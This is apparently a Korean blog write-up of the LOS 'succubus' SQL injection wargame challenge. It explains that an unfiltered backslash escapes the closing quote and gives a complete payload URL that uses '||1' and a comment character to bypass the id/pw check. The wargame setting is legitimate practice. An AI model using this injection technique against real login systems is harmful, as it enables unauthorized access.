select id from prob_succubus where id='' and pw=''


이렇게 생겼지만 잘보면 \를 필터링 안하고 있다.


'앞에 \가 붙어버리면 다른 문자로 인식해버리기 때문에 



id=' \' and pw=' 

저 부분을 전부 id로 인식해 버린다. 즉 뒤에다가 || 연산만 더해주면 끝


http://los.sandbox.cash/chall/succubus_1e73ac44ec838508bd2b2ce2026af8cf.php?id=\&pw=||1%23


뒤에를 주석처리해주면 된다.

저작자표시 비영리

'War Game > LOS' 카테고리의 다른 글

LOS Cobolt  (0) 2019.06.10
LOS DARK_EYES  (0) 2015.10.24
LOS ZOMBIE_ASSASSIN  (0) 2015.10.23
LOS ASSASSIN  (0) 2015.10.23
LOS GIANT  (0) 2015.10.23

+ Recent posts

티스토리툴바